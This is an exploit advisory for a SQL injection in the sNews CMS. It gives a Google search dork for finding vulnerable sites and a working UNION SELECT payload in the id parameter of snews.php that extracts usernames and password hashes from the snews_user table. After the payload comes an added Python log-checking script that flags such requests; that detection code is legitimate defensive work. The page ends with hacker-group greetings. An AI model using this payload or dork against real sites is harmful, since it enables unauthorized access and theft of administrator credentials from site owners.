Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
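
A defender's view of the request above, as an added example (not code from the original post or from sNews): a log check that flags snews.php requests whose id parameter is not a plain integer, after stripping the /**/ comments used in place of spaces. The function names and every sample request other than the page's own URL are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Sample request targets. The second is the example URL from this page;
# the others are constructed for illustration.
SAMPLE_REQUESTS = [
    "/snews/snews.php?act=shownews&id=23",
    "http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/"
    "0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user"
    "/**/where/**/id%20like%201/*",
    "/snews/snews.php?act=shownews&id=5%20UNION%20SELECT%201,2",
    "/snews/snews.php?act=shownews&id=abc",
]

# Closed /* ... */ comments, plus an unterminated trailing /* as in the PoC.
COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
SQL_WORDS = re.compile(r"\b(union|select|from|where|concat|char)\b", re.I)

def normalize(value):
    """Replace SQL comments with spaces and collapse runs of whitespace."""
    return " ".join(COMMENT.sub(" ", value).split())

def inspect_id(request_target):
    """Return (verdict, reason) for the id parameter of a snews.php request."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/snews.php"):
        return ("ignore", "other script")
    # parse_qs percent-decodes, so %20 and literal spaces are treated alike.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    for raw in values:
        if re.fullmatch(r"\d+", raw):
            continue
        hits = sorted({w.lower() for w in SQL_WORDS.findall(normalize(raw))})
        if hits:
            return ("alert", "sql keywords in id: " + ",".join(hits))
        return ("suspicious", "non-numeric id")
    return ("ok", "id absent or numeric")

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(inspect_id(target), target[:60])
```
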

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*